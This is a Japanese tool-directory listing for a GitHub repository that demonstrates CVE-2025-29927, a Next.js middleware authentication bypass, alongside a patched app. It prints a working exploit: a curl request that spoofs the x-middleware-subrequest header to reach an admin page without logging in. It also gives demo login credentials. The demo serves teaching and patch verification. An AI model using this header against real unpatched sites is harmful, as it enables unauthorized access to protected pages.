Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-29927 — Next.js CVE-2025-29927 デモ | Kitploit
ツール/GitHubGitHub/dante01yoon/cve-2025-29927
脆弱性分析ウェブアプリケーション悪用ウェブセキュリティ認証設定ミス学習と教育
GitHubdante01yoon/cve-2025-29927

CVE-2025-29927

Next.js CVE-2025-29927 デモ

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Next.js 脆弱性デモ (CVE-2025-29927)

このリポジトリには、Next.js バージョン 15.2.2 以前に影響する脆弱性 CVE-2025-29927 のデモが含まれています。この脆弱性により、攻撃者は x-middleware-subrequest ヘッダーを設定することでミドルウェアの認証チェックをバイパスできます。

リポジトリ構造

これは、2つの Next.js アプリケーションを含む NX モノレポです。

  1. vulnerable-app: 脆弱性を含む Next.js 15.2.2 を使用
  2. fixed-app: 修正が実装された Next.js 15.2.3 を使用

脆弱性の説明

Next.js 15.2.3 より前のバージョンには、ミドルウェア実装にセキュリティ上の脆弱性があります。ミドルウェアは x-middleware-subrequest ヘッダーの発信元を適切に検証しないため、攻撃者がこのヘッダーを偽装して、ミドルウェアベースの認証チェックをバイパスできるようになります。

デモの実行方法

前提条件

  • Node.js 18 以降
  • npm または yarn
  • Docker (オプション、コンテナ化されたデプロイ用)

脆弱なアプリの実行

root@kitploit:~
# Navigate to the repository
cd nextjs-vulnerability

# Install dependencies for the vulnerable app
cd apps/vulnerable-app
npm install

# Start the vulnerable app
npm run dev

脆弱なアプリは http://localhost:3000 で利用できます。

修正済みアプリの実行

root@kitploit:~
# Navigate to the repository
cd nextjs-vulnerability

# Install dependencies for the fixed app
cd apps/fixed-app
npm install

# Start the fixed app
npm run dev

修正済みアプリは http://localhost:3001 で利用できます。

Docker を使用する

アプリは Docker を使用して実行することもできます:

root@kitploit:~
# For the vulnerable app
cd apps/vulnerable-app
docker build -t nextjs-vulnerable .
docker run -p 3000:3000 nextjs-vulnerable

# For the fixed app
cd apps/fixed-app
docker build -t nextjs-fixed .
docker run -p 3001:3000 nextjs-fixed

脆弱性の実演

  1. 脆弱なアプリを開きます (http://localhost:3000)
  2. ナビゲーションバーの「Admin」をクリックします
  3. 認証されていないため、ログインページにリダイレクトされます
  4. 次に、脆弱性を使って管理ページに直接アクセスしてみます:
root@kitploit:~
# Using curl
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

# Or use a browser extension like ModHeader to add the header
# and then visit http://localhost:3000/admin

脆弱なバージョン (15.2.2) では、x-middleware-subrequest ヘッダーを追加することで、認証なしで管理ページにアクセスできます。

修正済みバージョン (15.2.3) では、ミドルウェアがこのヘッダーの発信元を正しく検証するため、ログインページにリダイレクトされたままになります。

ログイン認証情報

デモ用に、次の認証情報でログインできます:

  • ユーザー名: admin
  • パスワード: password123

セキュリティに関する推奨事項

本番環境で Next.js を使用している場合は、この脆弱性から保護するために、バージョン 15.2.3 以降に更新してください。

ツールをダウンロード